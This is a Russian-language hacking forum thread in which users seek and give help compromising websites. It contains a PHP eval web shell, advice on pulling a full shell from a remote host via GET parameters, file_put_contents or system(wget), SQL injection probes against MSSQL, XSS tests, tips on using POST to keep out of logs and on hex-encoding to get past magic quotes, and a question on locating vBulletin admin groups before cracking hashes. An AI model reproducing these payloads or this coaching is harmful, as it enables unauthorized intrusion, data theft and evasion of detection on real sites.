Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Cherep

    Cherep New Member

    Joined:
    30 May 2010
    Messages:
    158
    Likes Received:
    1
    Reputations:
    -10
    прочитал всёравно ничего полезного не нашел. Может ктонить помочь плз?
     
  2. plaeer

    plaeer New Member

    Joined:
    8 Mar 2011
    Messages:
    149
    Likes Received:
    3
    Reputations:
    1
    Каким образом найти раскрытие путей?
     
  3. brain

    brain Elder - Старейшина

    Joined:
    4 Jul 2010
    Messages:
    249
    Likes Received:
    90
    Reputations:
    33
    /showthread.php?t=30632
     
  4. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    505
    Likes Received:
    105
    Reputations:
    53
    поиск - классная штука.
    Code:
    http://www.google.ru/search?client=opera&rls=en&q=site:forum.antichat.ru+%D1%80%D0%B0%D1%81%D0%BA%D1%80%D1%8B%D1%82%D0%B8%D0%B5+%D0%BF%D1%83%D1%82%D0%B5%D0%B9&sourceid=opera&ie=utf-8&oe=utf-8&channel=suggest
    первая ссылка
    Code:
    /threadnav30632.html
    и ещё куча тем и тому подобного.
     
  5. justonline

    justonline network ninja

    Joined:
    27 Jul 2011
    Messages:
    499
    Likes Received:
    60
    Reputations:
    53
    Зашел на один портал, решил проверить логин на xss, при вставке <script>alert('12');</script> в любое поле(пароль;логин) ифрейм(вводятся данные в ифрейме) выдает -
    Server Error in '/' Application.

    Code:
    <b> Description: </b>An application error occurred on the server. The current custom error settings for this application prevent the details of the application error from being viewed remotely (for security reasons). It could, however, be viewed by browsers running on the local server machine.
    
                <br><br>
    
    
    
                <b>Details:</b> To enable the details of this specific error message to be viewable on remote machines, please create a &lt;customErrors&gt; tag within a &quot;web.config&quot; configuration file located in the root directory of the current web application. This &lt;customErrors&gt; tag should then have its &quot;mode&quot; attribute set to &quot;Off&quot;.<br><br>
    
    можно как-то использовать в своих целях?
     
  6. Apokalepsys

    Apokalepsys Banned

    Joined:
    23 Jan 2011
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Здравствуйте. Помигите пожалуйста.
    Допустим сайт вида http://sait.com/tut-tekst/i-tut.html

    возможно ли проверсти SQL иьекцию при таком виде ссылки если да то как. Какие еще можно провести атаки при таком виде ссылки чтобы получить доступ к базе данных
     
  7. plaeer

    plaeer New Member

    Joined:
    8 Mar 2011
    Messages:
    149
    Likes Received:
    3
    Reputations:
    1
    Такая проблема: залил файл с таким содержанием <?php @eval($_GET[cmd]); ?>.
    phpinfo вывелось без проблем, но когда делаю так eval(file_put_contents('site.ru/sh.txt')); , то ничего не происходит. Каким образом можно получить полноценный шелл?
     
  8. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,515
    Likes Received:
    400
    Reputations:
    196
    во-первых, http://php.net/manual/ru/function.file-put-contents.php
    во-вторых, magic quotes учитывай
    а шелл так льется, например:
    1=http://pentagon.gov/images/shell.txt&2=1.php&cmd=copy($_GET[1],$_GET[2]);
     
    #17508 попугай, 29 Jul 2011
    Last edited: 29 Jul 2011
  9. plaeer

    plaeer New Member

    Joined:
    8 Mar 2011
    Messages:
    149
    Likes Received:
    3
    Reputations:
    1
    1.Прочитал.
    2.magic_quotes_gpc On On
    3. Не работает.
     
  10. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,515
    Likes Received:
    400
    Reputations:
    196
    ну мог бы по аналогии fileputcontens заюзать

    1=<?php shell>&2=shell.php&cmd=file_put_contents($_GET[1],$_GET[2]);

    также можно вариации с методом POST использовать, чтоб в логах не следить, да и изначально писать не просто eval($_GET[CMD]), а что-нибудь поудобнее, например аплоадер файлов.
     
    1 person likes this.
  11. plaeer

    plaeer New Member

    Joined:
    8 Mar 2011
    Messages:
    149
    Likes Received:
    3
    Reputations:
    1
    file_put_contents - пробовал, безрезультатно.
    Так я лью через скулю, файл с таким кодом я хотел залить

    <?php if (isset($_REQUEST['e'])) eval(stripslashes($_REQUEST['e'])); ?>

    Но увы )); почему-то не приняло. Может в бейс закодить?
     
  12. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    505
    Likes Received:
    105
    Reputations:
    53
    читай про .htaccess. Не знаешь элементарного - нех лезть
     
  13. Nek1t

    Nek1t Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    181
    Likes Received:
    16
    Reputations:
    1
    Слабо знаком с SQL-иньекциями в MSSQL.
    http://www.site.com/internal.asp?ProdID=124335'
    http://www.site.com/internal.asp?ProdID=124335--
    Все в порядке, т.е. никаких кавычек и скобок закрывать не нужно, верно?

    http://www.site.com/internal.asp?ProdID=124335+AND+1=1--
    http://www.site.com/internal.asp?ProdID=124335+OR+1=@@version--
    Что я делаю не так?
     
  14. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,051
    Likes Received:
    615
    Reputations:
    690
    2Nek1t прочитай тут про "Все о MSSQL инъекциях."
     
    _________________________
  15. Nek1t

    Nek1t Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    181
    Likes Received:
    16
    Reputations:
    1
    Читал, и не только там.
    В общем, даже не важно, MSSQL или MySQL. Такая банальная вещь, как id=123+AND+1=1-- (или подобная) должна была сработать, но не вышло. Поэтому и спрашиваю, может нюанс какой-то не улавливаю?
     
    #17515 Nek1t, 30 Jul 2011
    Last edited: 30 Jul 2011
  16. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    674
    Likes Received:
    332
    Reputations:
    120
    все нюансы можно понять только увидев линк, т.к. каждый пример индивидуален и не имеет шаблонных решений (в большинстве своём)
     
  17. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,515
    Likes Received:
    400
    Reputations:
    196
    проверь версию php - file_put_contents толькой с пятой. Если действительно чеетвертая, то вариантов все равно масса - код аплоадера сунь, или через fwrite(fopen) или system(wget), или еще что-нибудь придумай.
    Кавычки убери или закодь, но не в бейс, а в хекс.
     
  18. plaeer

    plaeer New Member

    Joined:
    8 Mar 2011
    Messages:
    149
    Likes Received:
    3
    Reputations:
    1
    PHP/5.2.5
    Каким образом в хекс кодировать?
     
  19. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,248
    Likes Received:
    1,148
    Reputations:
    886
    клац

    или просто в консоли MySQL, select hex ('string'); (не забудь в начале добавить 0x)
     
    _________________________
  20. Cherep

    Cherep New Member

    Joined:
    30 May 2010
    Messages:
    158
    Likes Received:
    1
    Reputations:
    -10
    есть форум на vbulletin, можно ли какнибудь посмотреть(до расшифровки хешей), какие группы могут входить в админ панель?Точнее так, в какой таблице хранятся группы которые могут входить в админку
     
    #17520 Cherep, 31 Jul 2011
    Last edited: 31 Jul 2011
Thread Status:
Not open for further replies.